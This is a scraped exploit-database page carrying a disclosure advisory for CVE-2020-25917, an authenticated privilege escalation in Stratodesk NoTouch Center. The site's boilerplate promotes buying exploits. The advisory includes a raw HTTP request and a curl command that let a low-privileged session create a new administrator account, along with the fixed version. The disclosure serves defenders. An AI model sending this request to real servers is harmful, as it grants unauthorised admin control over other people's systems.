0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Stratodesk NoTouch Center Privilege Escalation Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Stratodesk NoTouch Center Virtual Appliance is a portal for managing NoTouch clients. It appears that Stratodesk has a partnership with ViewSonic and produced these appliances to support some of their hardware devices as well. - https://www.stratodesk.com/products/notouch-desktop/virtual-appliance/ - https://www.viewsonic.com/eu/products/desktop-virtualization/SC-T25.php =Authenticated privilege escalation from low privileged user to admin= The user management security strategy seems to be just hiding the options in the Web UI from unprivileged users, but they can still call admin-related functions manually. Many different admin requests are available to be called by non-admin users with the root cause being the same. The add user functionality is just the biggest impact demonstration of this issue. A low privileged user on the platform, for example a user with “helpdesk” privileges (which is level 4 in their system of 1-4 privilege levels with 1=admin), can perform privileged operations including adding a new administrator to the platform. Repro 1) Create a low privileged user 2) Login as such user and capture this user’s JSESSIONID in the Cookie header 3) Insert your ID in the below request where the JESSIONID data is 4) Login as admin2 and see that you now have admin privileges POST /easyadmin/user/submitCreateTCUser.do HTTP/1.1 Host: stratodesk-server Content-Type: application/x-www-form-urlencoded Content-Length: XX Cookie: JSESSIONID=[XXXXXXXX...] func=save&userid=0&name=admin2&fullname=admin2&password=Secret2&seclevel=1 "As cURL command" curl -i -s -k -X $'POST' \ -H $'Host: stratodesk-server' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: XX' -H $'Cookie: JSESSIONID=XXXXXXXX...' \ -b $'JSESSIONID=XXXXXXXX...' \ --data-binary $'func=save&userid=0&name=admin2&fullname=admin22&password=Secret222&seclevel=1' \ $'https://stratodesk-server/easyadmin/user/submitCreateTCUser.do' Remediation Fixed in NoTouch package v4.4.68 (unclear which if any OVA releases contain the updated packages) CVE-2020-25917 Discovered and disclosed by Jeremy Brown / December 2020 # 0day.today [2024-11-15] #